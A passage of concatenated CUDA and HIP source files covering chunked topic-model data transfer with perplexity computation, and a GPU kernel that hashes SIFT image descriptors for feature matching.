perplexityMid[i] / 467723.0; } printf("Parallel Perplexity:%f \n", sumPerplexity); } void Document::CPU2DiskPerplexity(string argFilePrefix) { ofstream OutPutPerplexity((argFilePrefix + string("/Perplexity.txt")).c_str(), ios::binary); for (int i = 0; i < maxTLLength; i++) { OutPutPerplexity << perplexity[i] << "\n"; } OutPutPerplexity.close(); } //void Document::GPUMemAllocate(int argGPUId) { // GPUId = argGPUId; // hipSetDevice(GPUId); // hipMalloc((void**)&deviceTLTopic, (maxTLLength) * sizeof(int)); // hipMalloc((void**)&deviceTLDocCount, (maxDocLength) * sizeof(int)); // hipMalloc((void**)&deviceTLDocOffset, (maxDocLength) * sizeof(int)); // hipMalloc((void**)&deviceTLWordCount, (wordLength) * sizeof(int)); // hipMalloc((void**)&deviceTLWordOffset, (wordLength) * sizeof(int)); // hipMalloc((void**)&deviceMapWord2Doc, (maxTLLength) * sizeof(int)); // hipMalloc((void**)&deviceMapDoc2Word, (maxTLLength) * sizeof(int)); // hipMalloc((void**)&devicePerplexity, (maxTLLength) * sizeof(float)); // hipMalloc((void**)&devicePerplexityMid, sizeof(float)*(GridDim*BlockDim / 32)); // // hipMalloc((void **)&d_blockCounter, sizeof(int)*(1)); // hipMalloc((void **)&d_warpCounter, sizeof(int)*(1)); // hipMalloc((void **)&d_dense, sizeof(int)*(GridDim*K)); // hipMalloc((void **)&deviceWTHeadDense, sizeof(float)*(GridDim*K)); // // // TLMemory = ((3 * maxTLLength + 2 * maxDocLength + 2 * wordLength + GridDim*K) * sizeof(int) + (maxTLLength + GridDim*BlockDim / 32 + GridDim*K) * sizeof(float))/ 1000000000.0; // // printf("Token list memory usage:%f GB\n", TLMemory); // // //} void Document::CPU2GPU(int argGPUId, int argChunkId) { hipSetDevice(argGPUId); hipMemcpy(GPUChunkVec[argGPUId].deviceTLTopic, docChunkVec[argChunkId].TLTopic, (TLLengthVec[argChunkId]) * sizeof(int), hipMemcpyHostToDevice); hipMemcpy(GPUChunkVec[argGPUId].deviceTLDocCount, docChunkVec[argChunkId].TLDocCount, (docLengthVec[argChunkId]) * sizeof(int), hipMemcpyHostToDevice); hipMemcpy(GPUChunkVec[argGPUId].deviceTLDocOffset, docChunkVec[argChunkId].TLDocOffset, (docLengthVec[argChunkId]) * sizeof(int), hipMemcpyHostToDevice); hipMemcpy(GPUChunkVec[argGPUId].deviceTLWordCount, docChunkVec[argChunkId].TLWordCount, (wordLength) * sizeof(int), hipMemcpyHostToDevice); hipMemcpy(GPUChunkVec[argGPUId].deviceTLWordOffset, docChunkVec[argChunkId].TLWordOffset, (wordLength) * sizeof(int), hipMemcpyHostToDevice); hipMemcpy(GPUChunkVec[argGPUId].deviceMapWord2Doc, docChunkVec[argChunkId].mapWord2Doc, (TLLengthVec[argChunkId]) * sizeof(int), hipMemcpyHostToDevice); hipMemcpy(GPUChunkVec[argGPUId].deviceMapDoc2Word, docChunkVec[argChunkId].mapDoc2Word, (TLLengthVec[argChunkId]) * sizeof(int), hipMemcpyHostToDevice); } void Document::GPU2CPU(int argGPUId, int argChunkId) { hipSetDevice(argGPUId); hipMemcpy(docChunkVec[argChunkId].TLTopic, GPUChunkVec[argGPUId].deviceTLTopic, (TLLengthVec[argChunkId]) * sizeof(int), hipMemcpyDeviceToHost); }
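// Document::CPU2GPU above issues seven blocking hipMemcpy calls per chunk. The
// sketch below shows how one of those copies could be made asynchronous on a
// stream; the field names are taken from the class above, but the stream and
// the pinned-memory requirement are assumptions, not something Doc.cuh sets up.
#include <hip/hip_runtime.h>

void CopyChunkTopicAsyncSketch(int* deviceTLTopic, const int* hostTLTopic,
                               int tlLength, hipStream_t stream)
{
    // hipMemcpyAsync only overlaps with host work when the host buffer is
    // pinned (hipHostMalloc); with pageable memory it behaves like a sync copy.
    hipMemcpyAsync(deviceTLTopic, hostTLTopic, tlLength * sizeof(int),
                   hipMemcpyHostToDevice, stream);
}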
b6a89695e4ad878373ae2ecee66150d6518b26d6.cu
#include "Doc.cuh" Document::Document(string argFilePrefix, int argNumChunks, int argMaxTLLength, int argmaxDocLength, int argWordLength, int argNumGPUs) { filePrefix = argFilePrefix; numChunks = argNumChunks; maxTLLength = argMaxTLLength; maxDocLength = argmaxDocLength; wordLength = argWordLength; numGPUs = argNumGPUs; perplexityMid = new float[GridDim*BlockDim / 32]; //perplexityMid2 = new float[GridDim*BlockDim / 32]; perplexity = new float[maxTLLength]; } void Document::loadDocument() { TLLengthVec = new int[numChunks]; docLengthVec = new int[numChunks]; numOfTokenVecD = new int[numChunks]; numOfTokenVecS = new int[numChunks]; ifstream docLength((filePrefix + string("/docLength.txt")).c_str(), ios::binary);//store max Doc and DT length ifstream TLLength((filePrefix + string("/TLLength.txt")).c_str(), ios::binary); ifstream TLSplit((filePrefix + string("/TLSplit.txt")).c_str(), ios::binary); for (int chunkId = 0; chunkId < numChunks; chunkId++) { TLLength >> TLLengthVec[chunkId]; docLength >> docLengthVec[chunkId]; TLSplit >> numOfTokenVecD[chunkId] >> numOfTokenVecS[chunkId]; DocChunk tmpDocChunk(TLLengthVec[chunkId], docLengthVec[chunkId], wordLength); tmpDocChunk.CPUMemSet(); tmpDocChunk.loadChunk(filePrefix, chunkId); docChunkVec.push_back(tmpDocChunk); } printf("All chunks loaded!"); docLength.close(); TLLength.close(); } void Document::InitGPU() { for (int GPUId = 0; GPUId < numGPUs; GPUId++) { GPUChunk ChunkGPU(maxTLLength, maxDocLength, wordLength); ChunkGPU.GPUMemAllocate(GPUId); GPUChunkVec.push_back(ChunkGPU); } } void Document::CPU2GPUPerplexity(int argGPUId) { cudaSetDevice(argGPUId); memset(perplexityMid, 0, GridDim*BlockDim / 32 * sizeof(float)); //memset(perplexityMid2, 0, GridDim*BlockDim / 32 * sizeof(float)); cudaMemcpy(GPUChunkVec[argGPUId].devicePerplexityMid, perplexityMid, (GridDim*BlockDim / 32) * sizeof(float), cudaMemcpyHostToDevice); cudaMemset(GPUChunkVec[argGPUId].devicePerplexity,0,maxTLLength*sizeof(float)); } void Document::GPU2CPUPerplexity(int argGPUId) { //cudaSetDevice(argGPUId); //if (argGPUId == 0) { // cudaMemcpy(perplexityMid, GPUChunkVec[argGPUId].devicePerplexityMid, (GridDim*BlockDim / 32) * sizeof(float), cudaMemcpyDeviceToHost); //} // //else { // cudaMemcpy(perplexityMid2, GPUChunkVec[argGPUId].devicePerplexityMid, (GridDim*BlockDim / 32) * sizeof(float), cudaMemcpyDeviceToHost); //} // ///*cudaMemcpy(perplexity, GPUChunkVec[argGPUId].devicePerplexity, maxTLLength*sizeof(float), cudaMemcpyDeviceToHost);*/ //sumPerplexity = 0.0; //if (argGPUId == 0) { // for (int i = 0; i < GridDim*BlockDim / 32; i++) { // // printf("Perplexity:%f \n", h_PerplexityMid[i]); // sumPerplexity += perplexityMid[i] / 467723.0; // } //} //else { // for (int i = 0; i < GridDim*BlockDim / 32; i++) { // // printf("Perplexity:%f \n", h_PerplexityMid[i]); // sumPerplexity += perplexityMid2[i] / 467723.0; // } //} // //printf("Parallel Perplexity:%f \n", sumPerplexity); cudaSetDevice(argGPUId); cudaMemcpy(perplexityMid, GPUChunkVec[argGPUId].devicePerplexityMid, (GridDim*BlockDim / 32) * sizeof(float), cudaMemcpyDeviceToHost); //else { // cudaMemcpy(perplexityMid2, GPUChunkVec[argGPUId].devicePerplexityMid, (GridDim*BlockDim / 32) * sizeof(float), cudaMemcpyDeviceToHost); //} /*cudaMemcpy(perplexity, GPUChunkVec[argGPUId].devicePerplexity, maxTLLength*sizeof(float), cudaMemcpyDeviceToHost);*/ sumPerplexity = 0.0; for (int i = 0; i < GridDim*BlockDim / 32; i++) { // printf("Perplexity:%f \n", h_PerplexityMid[i]); sumPerplexity += perplexityMid[i] / 467723.0; } 
printf("Parallel Perplexity:%f \n", sumPerplexity); } void Document::CPU2DiskPerplexity(string argFilePrefix) { ofstream OutPutPerplexity((argFilePrefix + string("/Perplexity.txt")).c_str(), ios::binary); for (int i = 0; i < maxTLLength; i++) { OutPutPerplexity << perplexity[i] << "\n"; } OutPutPerplexity.close(); } //void Document::GPUMemAllocate(int argGPUId) { // GPUId = argGPUId; // cudaSetDevice(GPUId); // cudaMalloc((void**)&deviceTLTopic, (maxTLLength) * sizeof(int)); // cudaMalloc((void**)&deviceTLDocCount, (maxDocLength) * sizeof(int)); // cudaMalloc((void**)&deviceTLDocOffset, (maxDocLength) * sizeof(int)); // cudaMalloc((void**)&deviceTLWordCount, (wordLength) * sizeof(int)); // cudaMalloc((void**)&deviceTLWordOffset, (wordLength) * sizeof(int)); // cudaMalloc((void**)&deviceMapWord2Doc, (maxTLLength) * sizeof(int)); // cudaMalloc((void**)&deviceMapDoc2Word, (maxTLLength) * sizeof(int)); // cudaMalloc((void**)&devicePerplexity, (maxTLLength) * sizeof(float)); // cudaMalloc((void**)&devicePerplexityMid, sizeof(float)*(GridDim*BlockDim / 32)); // // cudaMalloc((void **)&d_blockCounter, sizeof(int)*(1)); // cudaMalloc((void **)&d_warpCounter, sizeof(int)*(1)); // cudaMalloc((void **)&d_dense, sizeof(int)*(GridDim*K)); // cudaMalloc((void **)&deviceWTHeadDense, sizeof(float)*(GridDim*K)); // // // TLMemory = ((3 * maxTLLength + 2 * maxDocLength + 2 * wordLength + GridDim*K) * sizeof(int) + (maxTLLength + GridDim*BlockDim / 32 + GridDim*K) * sizeof(float))/ 1000000000.0; // // printf("Token list memory usage:%f GB\n", TLMemory); // // //} void Document::CPU2GPU(int argGPUId, int argChunkId) { cudaSetDevice(argGPUId); cudaMemcpy(GPUChunkVec[argGPUId].deviceTLTopic, docChunkVec[argChunkId].TLTopic, (TLLengthVec[argChunkId]) * sizeof(int), cudaMemcpyHostToDevice); cudaMemcpy(GPUChunkVec[argGPUId].deviceTLDocCount, docChunkVec[argChunkId].TLDocCount, (docLengthVec[argChunkId]) * sizeof(int), cudaMemcpyHostToDevice); cudaMemcpy(GPUChunkVec[argGPUId].deviceTLDocOffset, docChunkVec[argChunkId].TLDocOffset, (docLengthVec[argChunkId]) * sizeof(int), cudaMemcpyHostToDevice); cudaMemcpy(GPUChunkVec[argGPUId].deviceTLWordCount, docChunkVec[argChunkId].TLWordCount, (wordLength) * sizeof(int), cudaMemcpyHostToDevice); cudaMemcpy(GPUChunkVec[argGPUId].deviceTLWordOffset, docChunkVec[argChunkId].TLWordOffset, (wordLength) * sizeof(int), cudaMemcpyHostToDevice); cudaMemcpy(GPUChunkVec[argGPUId].deviceMapWord2Doc, docChunkVec[argChunkId].mapWord2Doc, (TLLengthVec[argChunkId]) * sizeof(int), cudaMemcpyHostToDevice); cudaMemcpy(GPUChunkVec[argGPUId].deviceMapDoc2Word, docChunkVec[argChunkId].mapDoc2Word, (TLLengthVec[argChunkId]) * sizeof(int), cudaMemcpyHostToDevice); } void Document::GPU2CPU(int argGPUId, int argChunkId) { cudaSetDevice(argGPUId); cudaMemcpy(docChunkVec[argChunkId].TLTopic, GPUChunkVec[argGPUId].deviceTLTopic, (TLLengthVec[argChunkId]) * sizeof(int), cudaMemcpyDeviceToHost); }
ff98e2242f18b75d537e5ddbf722a8b2110189c8.hip
// !!! This is a file automatically generated by hipify!!! #include "hip/hip_runtime.h" #include <iostream> #include <thrust/sort.h> //#include <inttypes.h> #include "kernel_test.h" #include "Common.h" #define BLOCK_SIZE 32 #define TOP_PER_THREAD_HAMMING_LIST_SIZE 32 * 10 __global__ void compute_hash_kernel(ImageData *ptr, float* d_firstProjMat, float *d_secondProjMat, int imageIndex) { int index = blockIdx.x * blockDim.x + threadIdx.x; if (index < ptr->cntPoint) { //if (index == 2) { float sumFirstHash; for (int m = 0; m < kCntBucketGroup; m++){ int bucketid = 0; for (int j = 0; j < kCntBucketBit; j++) { sumFirstHash = 0.0f; for (int k = 0; k < kDimSiftData; k++) { sumFirstHash += ptr->deviceSiftDataPtrList[index * kDimSiftData + k] * d_firstProjMat[m * kDimSiftData * kCntBucketBit + j * kDimSiftData + k]; } /*if (imageIndex == 0 && index == 0 && m == 0) printf("sum = %f\n", sumFirstHash);*/ bucketid = (bucketid << 1) + (sumFirstHash > 0 ? 1 : 0); //imgdata.point_to_bucket_map[point_number] = bucketid; } ptr->deviceBucketIDSiftPoint[ptr->cntPoint * m + index] = bucketid; /*if (imageIndex == 0 && index < 35 && m == 0){ printf("***my index is %d, my image index is %d, the bucketgroup is %d, the bucketId is %d\n", index, imageIndex, m, bucketid); }*/ } int sumSecondHash; for (int m = 0; m < kDimSiftData; m++) { sumSecondHash = 0.0f; for (int j = 0; j < kDimSiftData; j++) { //if (imageIndex == 0 && index == 0 && m == 0) // printf("sift data kernel= %d, second proj mat kernel= %f\n", ptr->deviceSiftDataPtrList[index * kDimSiftData + j], d_secondProjMat[m * kDimSiftData + j]); sumSecondHash += ptr->deviceSiftDataPtrList[index * kDimSiftData + j] * d_secondProjMat[m * kDimSiftData + j]; } ptr->deviceHashDataPtrList[index * kDimSiftData + m] = (sumSecondHash > 0 ? 
1 : 0); /*if (imageIndex == 0 && (index == 5) && m == 0) printf("second sum = %d\n", sumSecondHash);*/ } //printf("second hash value = %d", ptr->hashDataPtrList[127]); // calculate the CompHash code // compress <kBitInCompHash> Hash code bits within a single <uint64_t> variable for (int dimCompHashIndex = 0; dimCompHashIndex < kDimCompHashData; dimCompHashIndex++) { uint64_t compHashBitVal = 0; int dimHashIndexLBound = dimCompHashIndex * kBitInCompHash; int dimHashIndexUBound = (dimCompHashIndex + 1) * kBitInCompHash; for (int dimHashIndex = dimHashIndexLBound; dimHashIndex < dimHashIndexUBound; dimHashIndex++) { compHashBitVal = (compHashBitVal << 1) + ptr->deviceHashDataPtrList[index * kDimSiftData + dimHashIndex]; // set the corresponding bit to 1/0 } /*if (imageIndex == 0 && index == 0) { printf("hashdata %llu\n", compHashBitVal); }*/ ptr->compHashDataPtrList[index * kDimCompHashData + dimCompHashIndex] = compHashBitVal; //compHashDataPtr[dimCompHashIndex] = compHashBitVal; } // //if(imageIndex == 1 && index == 2414) { // printf("generated hash value %llu ====%llu\n", ptr->compHashDataPtrList[0], ptr->compHashDataPtrList[1]); // //printf("compress 1: %lld, compress2: %lld\n", ptr->compHashDataPtrList[0], ptr->compHashDataPtrList[1]); //} } } void compute_hash_GPU(ImageData **device_ptr, ImageData *host_ptr ,int img_cnt, float *d_firstProjMat, float *d_secondProjMat, float *firstProjMat) { hipStream_t streams[img_cnt]; for (int i = 0; i < img_cnt; i++) { hipStreamCreate(&streams[i]); } for(int i = 0; i < img_cnt; i++){ //Parallel dim3 block(1024); dim3 grid((host_ptr->cntPoint + block.x - 1) / block.x); //std::cout << "block = " << block.x << " grid = " << grid.x << std::endl; hipLaunchKernelGGL(( compute_hash_kernel), dim3(grid), dim3(block), 0, streams[i], device_ptr[i], d_firstProjMat, d_secondProjMat, i); //hello<<<grid, block>>>(device_ptr[i], d_firstProjMat, d_secondProjMat, i); //CUDA_CHECK_ERROR; host_ptr++; } hipDeviceSynchronize(); } /* __global__ void hamming_distance_kernel(ImageData *imageData1, ImageData *imageData2, HashData *hashData1, HashData *hashData2, uint16_t* deviceCandidateList, uint8_t* deviceCandidateCntList) { //int index = blockIdx.x * blockDim.x; int index = blockIdx.x; //printf("blockidx.x = %d, blockdim.x = %d\n", blockIdx.x, blockDim.x); int bucket_id; __shared__ uint16_t totalCandidateSiftPoints; __shared__ uint16_t *candidateSiftPointList; __shared__ uint8_t *candidateHammingDistance; if (index < imageData1->cntPoint) { if (threadIdx.x == 0) { totalCandidateSiftPoints = 0; //printf("%d\n", index); //printf("sift count 1: %d, sift count 2: %d \n", imageData1->cntPoint, imageData2->cntPoint); //printf("bucket count: %d, bucket point: %d \n", hashData1->deviceCntSiftPointInBucket[0], hashData2->deviceCntSiftPointInBucket[0]); for (int i = 0; i < kCntBucketGroup; i++) { bucket_id = imageData1->deviceBucketIDSiftPoint[imageData1->cntPoint * i + index]; totalCandidateSiftPoints = totalCandidateSiftPoints + hashData2->deviceCntSiftPointInBucket[i * kCntBucketPerGroup + bucket_id]; } candidateSiftPointList = new uint16_t[totalCandidateSiftPoints]; candidateHammingDistance = new uint8_t[totalCandidateSiftPoints]; int dataIndex = 0; for (int i = 0; i < kCntBucketGroup; i++) { int countSiftPointsBucket = 0; bucket_id = imageData1->deviceBucketIDSiftPoint[imageData1->cntPoint * i + index]; countSiftPointsBucket = hashData2->deviceCntSiftPointInBucket[i * kCntBucketPerGroup + bucket_id]; for (int j = 0; j < countSiftPointsBucket; j++) { 
candidateSiftPointList[dataIndex] = hashData2->deviceBucketList[i * kCntBucketPerGroup + bucket_id][j]; dataIndex++; } } } } __syncthreads(); int64_t firstImageHashA, firstImageHashB, secondImageHashA, secondImageHashB; firstImageHashA = imageData1->compHashDataPtrList[index * kDimCompHashData]; firstImageHashB = imageData1->compHashDataPtrList[index * kDimCompHashData + 1]; for (int i = 0; i < int8_t((totalCandidateSiftPoints + BLOCK_SIZE - 1) / BLOCK_SIZE); i++){ if ((i * BLOCK_SIZE + threadIdx.x) < totalCandidateSiftPoints) { secondImageHashA = imageData2->compHashDataPtrList[candidateSiftPointList[i * BLOCK_SIZE + threadIdx.x] * kDimCompHashData]; secondImageHashB = imageData2->compHashDataPtrList[candidateSiftPointList[i * BLOCK_SIZE + threadIdx.x] * kDimCompHashData + 1]; candidateHammingDistance[i * BLOCK_SIZE + threadIdx.x] = __popcll(firstImageHashA ^ secondImageHashA) + __popcll(firstImageHashB ^ secondImageHashB); //if(index == 0){ //printf("hamming distance = %d \n", candidateHammingDistance[i * BLOCK_SIZE + threadIdx.x]); //} } } __syncthreads(); __shared__ uint16_t topKCandidates[kCntCandidateTopMin]; if (index < imageData1->cntPoint) { //if (threadIdx.x == 0 && index == 0) { int candidatesFoundCnt; if(threadIdx.x == 0){ //printf("image no= %d\n", imageData1->cntPoint); //printf("%d, %d\n", index, totalCandidateSiftPoints); thrust::sort_by_key(thrust::seq, candidateHammingDistance, candidateHammingDistance + totalCandidateSiftPoints, candidateSiftPointList); candidatesFoundCnt = 0; uint16_t candidate; bool duplicate; for(int i = 0; i < totalCandidateSiftPoints; i++){ duplicate = false; //printf("Index: %d, The sorted hamming distance:%d\n", i, candidateHammingDistance[i]); //printf("The corresponding point is:%d\n", candidateSiftPointList[i]); candidate = candidateSiftPointList[i]; for(int j = 0; j < candidatesFoundCnt; j++){ if(candidate == topKCandidates[j]) { duplicate = true; } } if(duplicate == true){ continue; } topKCandidates[candidatesFoundCnt] = candidate; candidatesFoundCnt++; if(candidatesFoundCnt == kCntCandidateTopMin) { break; } } //printf("max = %d, \n", max); for(int i = 0; i < candidatesFoundCnt; i++){ //if (index == 100) //printf("index: %d, The candidate is %d\n", index, topKCandidates[i]); deviceCandidateList[index * kCntCandidateTopMin + i] = topKCandidates[i]; } deviceCandidateCntList[index] = candidatesFoundCnt; } } if(threadIdx.x == 0 && index < imageData1->cntPoint){ delete[] candidateSiftPointList; } } void compute_hamming_distance_GPU(ImageData *deviceptr1, ImageData* deviceptr2, HashData *hashData1, HashData *hashData2, int siftCount, uint16_t* deviceCandidateList, uint8_t* deviceCandidateCntList){ dim3 block(BLOCK_SIZE); dim3 grid(siftCount); hamming_distance_kernel<<<grid, block>>>(deviceptr1, deviceptr2, hashData1, hashData2, deviceCandidateList, deviceCandidateCntList); //hamming_distance_kernel<<<grid, block>>>(deviceptr[4], deviceptr[5], hashData1, hashData2, deviceCandidateList, deviceCandidateCntList); //hipDeviceSynchronize(); } */ void compute_hashes_serial(ImageData **device_ptr, ImageData *host_ptr ,int img_cnt, float *d_firstProjMat, float *d_secondProjMat, float *firstProjMat){ //Serial //for (int dataIndex = 0; dataIndex < host_ptr->cntPoint; dataIndex++) //{ // // obtain pointers for SIFT feature vector, Hash code and CompHash code // SiftDataPtr siftDataPtr = host_ptr->siftDataPtrList[dataIndex]; // int bucketID = 0; // // determine the bucket index for each bucket group // for (int m = 0; m < kCntBucketGroup; m++) { // bucketID = 
0; // for (int j = 0; j < kCntBucketBit; j++) { // float sum = 0.0f; // for (int k = 0; k < kDimSiftData; k++) { // if (i == 0 && dataIndex == 0 && m == 0) { // //std::cout << "proj data inside fun" << firstProjMat[m * kDimSiftData * kCntBucketBit + j * kDimSiftData + k] << std::endl; // //printf("sift data = %d, proj data = %f\n", siftDataPtr[k], firstProjMat[m * kDimSiftData * kCntBucketBit + j * kDimSiftData + k]); // } // if (siftDataPtr[k] != 0) { // sum += siftDataPtr[k] * firstProjMat[m * kDimSiftData * kCntBucketBit + j * kDimSiftData + k]; // } // } // // if (i == 0 && dataIndex == 0 && m == 0) { // printf("sum = %f\n", sum); // } // bucketID = (bucketID << 1) + (sum > 0 ? 1 : 0); // } // if (i == 0 && dataIndex == 0 && m == 0) { // printf("===============index = %d, group index = %d, bucket id = %d, image no = %d\n===================", dataIndex, m, bucketID, i); // } // } //} // } // //typedef struct StructA { // SiftDataPtr *arrval; // int flag; //} StructA; // //__global__ void kernel(StructA *in) { // // for (int i = 0; i < 2; i++) { // //printf("flag val = %d\n", in[i].flag); // //printf("address = %p\n", in[i].arrval); // for (int j = 0; j < 3; j++) { // for (int k = 0; k < 5; k++) { // //printf("address = %p\n", &in[i].arrval[j * 5 + k]); // //printf("val = %d\n", in[i].arrval[j * 5 + k]); // printf("val = %d\n", d_arrval[i][j * 5 + k]); // } // } // printf("-------------------------------------------\n"); // } //} // //void call_kernel_test2() //{ // StructA *h_a, *d_a; // // printf("h_a address:%p\n", h_a); // h_a = (StructA*)malloc(2 * sizeof(StructA)); // printf("h_a address:%p\n", h_a); // // for (int i = 0; i < 2; i++) { // printf("h_a[%d] arrval address:%p\n", i, h_a[i].arrval); // h_a[i].arrval = (SiftDataPtr*)malloc(3 * sizeof(SiftDataPtr)); // printf("h_a[%d] arrval address:%p\n", i, h_a[i].arrval); // for (int j = 0; j < 3; j++) { // h_a[i].arrval[j] = (int*)malloc(5 * sizeof(int)); // } // } // // int counter = 0; // for (int i = 0; i < 2; i++) { // for (int j = 0; j < 3; j++) { // for (int k = 0; k < 5; k++) { // counter += 1; // h_a[i].arrval[j][k] = counter; // } // //printf("\n"); // } // h_a[i].flag = counter; // } // // /*for (int i = 0; i < 2; i++) { // for (int j = 0; j < 8; j++) { // for (int k = 0; k < 5; k++) // printf("val = %d\t", h_a[i].arrval[j][k]); // printf("\n"); // } // printf("-------------------------------------------\n"); // }*/ // // // 1. Allocate device array. // // size_t sz = 0; // hipDeviceGetLimit(&sz, hipLimitMallocHeapSize); // printf("heap size:%ld\n", sz); // // hipMalloc(&d_a, sizeof(StructA) * 2); // CUDA_CHECK_ERROR; // hipMemcpy(d_a, h_a, sizeof(StructA) * 2, hipMemcpyHostToDevice); // CUDA_CHECK_ERROR; // // int *d_arrval[2]; // // for (int i = 0; i < 2; i++) { // hipMalloc(&d_arrval[i], 3 * 5 * sizeof(int)); // hipMemcpy(&d_a[i].arrval, &d_arrval[i], sizeof(int*), hipMemcpyHostToDevice); // for (int j = 0; j < 3; j++) { // hipMemcpy(&d_arrval[i][j], h_a[i].arrval[j], 5 * sizeof(int), hipMemcpyHostToDevice); // } // } // // // 4. Call kernel with host struct as argument // kernel<<<1, 1>>>(d_a); // // // 5. Copy pointer from device to host. // //hipMemcpy(h_arr, d_arr, sizeof(int)*10, hipMemcpyDeviceToHost); // // // 6. 
Point to host pointer in host struct // // (or do something else with it if this is not needed) // //h_a.arr = h_arr; // //} // //class Particle //{ //public: // double *_w; //}; // //__global__ void test(Particle *p) { // // int idx = threadIdx.x + blockDim.x*blockIdx.x; // // if (idx == 2) { // printf("dev_p[2]._w[2] = %f\n", p[idx]._w[2]); // } //} // //void call_kernel_test3() //{ // int nParticles = 100; // Particle *dev_p; // double *w[nParticles]; // hipMalloc((void**)&dev_p, nParticles * sizeof(Particle)); // CUDA_CHECK_ERROR; // // for (int i = 0; i < nParticles; i++) { // hipMalloc((void**)&(w[i]), 300 * sizeof(double)); // CUDA_CHECK_ERROR; // hipMemcpy(&(dev_p[i]._w), &(w[i]), sizeof(double *), hipMemcpyHostToDevice); // CUDA_CHECK_ERROR; // } // double testval = 32.7; // hipMemcpy(w[2] + 2, &testval, sizeof(double), hipMemcpyHostToDevice); // CUDA_CHECK_ERROR; // test << <1, 32 >> >(dev_p); // hipDeviceSynchronize(); // CUDA_CHECK_ERROR; // printf("Done!\n"); //}
ff98e2242f18b75d537e5ddbf722a8b2110189c8.cu
#include <iostream> #include <thrust/sort.h> //#include <inttypes.h> #include "kernel_test.h" #include "Common.h" #define BLOCK_SIZE 32 #define TOP_PER_THREAD_HAMMING_LIST_SIZE 32 * 10 __global__ void compute_hash_kernel(ImageData *ptr, float* d_firstProjMat, float *d_secondProjMat, int imageIndex) { int index = blockIdx.x * blockDim.x + threadIdx.x; if (index < ptr->cntPoint) { //if (index == 2) { float sumFirstHash; for (int m = 0; m < kCntBucketGroup; m++){ int bucketid = 0; for (int j = 0; j < kCntBucketBit; j++) { sumFirstHash = 0.0f; for (int k = 0; k < kDimSiftData; k++) { sumFirstHash += ptr->deviceSiftDataPtrList[index * kDimSiftData + k] * d_firstProjMat[m * kDimSiftData * kCntBucketBit + j * kDimSiftData + k]; } /*if (imageIndex == 0 && index == 0 && m == 0) printf("sum = %f\n", sumFirstHash);*/ bucketid = (bucketid << 1) + (sumFirstHash > 0 ? 1 : 0); //imgdata.point_to_bucket_map[point_number] = bucketid; } ptr->deviceBucketIDSiftPoint[ptr->cntPoint * m + index] = bucketid; /*if (imageIndex == 0 && index < 35 && m == 0){ printf("***my index is %d, my image index is %d, the bucketgroup is %d, the bucketId is %d\n", index, imageIndex, m, bucketid); }*/ } int sumSecondHash; for (int m = 0; m < kDimSiftData; m++) { sumSecondHash = 0.0f; for (int j = 0; j < kDimSiftData; j++) { //if (imageIndex == 0 && index == 0 && m == 0) // printf("sift data kernel= %d, second proj mat kernel= %f\n", ptr->deviceSiftDataPtrList[index * kDimSiftData + j], d_secondProjMat[m * kDimSiftData + j]); sumSecondHash += ptr->deviceSiftDataPtrList[index * kDimSiftData + j] * d_secondProjMat[m * kDimSiftData + j]; } ptr->deviceHashDataPtrList[index * kDimSiftData + m] = (sumSecondHash > 0 ? 1 : 0); /*if (imageIndex == 0 && (index == 5) && m == 0) printf("second sum = %d\n", sumSecondHash);*/ } //printf("second hash value = %d", ptr->hashDataPtrList[127]); // calculate the CompHash code // compress <kBitInCompHash> Hash code bits within a single <uint64_t> variable for (int dimCompHashIndex = 0; dimCompHashIndex < kDimCompHashData; dimCompHashIndex++) { uint64_t compHashBitVal = 0; int dimHashIndexLBound = dimCompHashIndex * kBitInCompHash; int dimHashIndexUBound = (dimCompHashIndex + 1) * kBitInCompHash; for (int dimHashIndex = dimHashIndexLBound; dimHashIndex < dimHashIndexUBound; dimHashIndex++) { compHashBitVal = (compHashBitVal << 1) + ptr->deviceHashDataPtrList[index * kDimSiftData + dimHashIndex]; // set the corresponding bit to 1/0 } /*if (imageIndex == 0 && index == 0) { printf("hashdata %llu\n", compHashBitVal); }*/ ptr->compHashDataPtrList[index * kDimCompHashData + dimCompHashIndex] = compHashBitVal; //compHashDataPtr[dimCompHashIndex] = compHashBitVal; } // //if(imageIndex == 1 && index == 2414) { // printf("generated hash value %llu ====%llu\n", ptr->compHashDataPtrList[0], ptr->compHashDataPtrList[1]); // //printf("compress 1: %lld, compress2: %lld\n", ptr->compHashDataPtrList[0], ptr->compHashDataPtrList[1]); //} } } void compute_hash_GPU(ImageData **device_ptr, ImageData *host_ptr ,int img_cnt, float *d_firstProjMat, float *d_secondProjMat, float *firstProjMat) { cudaStream_t streams[img_cnt]; for (int i = 0; i < img_cnt; i++) { cudaStreamCreate(&streams[i]); } for(int i = 0; i < img_cnt; i++){ //Parallel dim3 block(1024); dim3 grid((host_ptr->cntPoint + block.x - 1) / block.x); //std::cout << "block = " << block.x << " grid = " << grid.x << std::endl; compute_hash_kernel<<<grid, block, 0, streams[i]>>>(device_ptr[i], d_firstProjMat, d_secondProjMat, i); //hello<<<grid, block>>>(device_ptr[i], 
d_firstProjMat, d_secondProjMat, i); //CUDA_CHECK_ERROR; host_ptr++; } cudaDeviceSynchronize(); } /* __global__ void hamming_distance_kernel(ImageData *imageData1, ImageData *imageData2, HashData *hashData1, HashData *hashData2, uint16_t* deviceCandidateList, uint8_t* deviceCandidateCntList) { //int index = blockIdx.x * blockDim.x; int index = blockIdx.x; //printf("blockidx.x = %d, blockdim.x = %d\n", blockIdx.x, blockDim.x); int bucket_id; __shared__ uint16_t totalCandidateSiftPoints; __shared__ uint16_t *candidateSiftPointList; __shared__ uint8_t *candidateHammingDistance; if (index < imageData1->cntPoint) { if (threadIdx.x == 0) { totalCandidateSiftPoints = 0; //printf("%d\n", index); //printf("sift count 1: %d, sift count 2: %d \n", imageData1->cntPoint, imageData2->cntPoint); //printf("bucket count: %d, bucket point: %d \n", hashData1->deviceCntSiftPointInBucket[0], hashData2->deviceCntSiftPointInBucket[0]); for (int i = 0; i < kCntBucketGroup; i++) { bucket_id = imageData1->deviceBucketIDSiftPoint[imageData1->cntPoint * i + index]; totalCandidateSiftPoints = totalCandidateSiftPoints + hashData2->deviceCntSiftPointInBucket[i * kCntBucketPerGroup + bucket_id]; } candidateSiftPointList = new uint16_t[totalCandidateSiftPoints]; candidateHammingDistance = new uint8_t[totalCandidateSiftPoints]; int dataIndex = 0; for (int i = 0; i < kCntBucketGroup; i++) { int countSiftPointsBucket = 0; bucket_id = imageData1->deviceBucketIDSiftPoint[imageData1->cntPoint * i + index]; countSiftPointsBucket = hashData2->deviceCntSiftPointInBucket[i * kCntBucketPerGroup + bucket_id]; for (int j = 0; j < countSiftPointsBucket; j++) { candidateSiftPointList[dataIndex] = 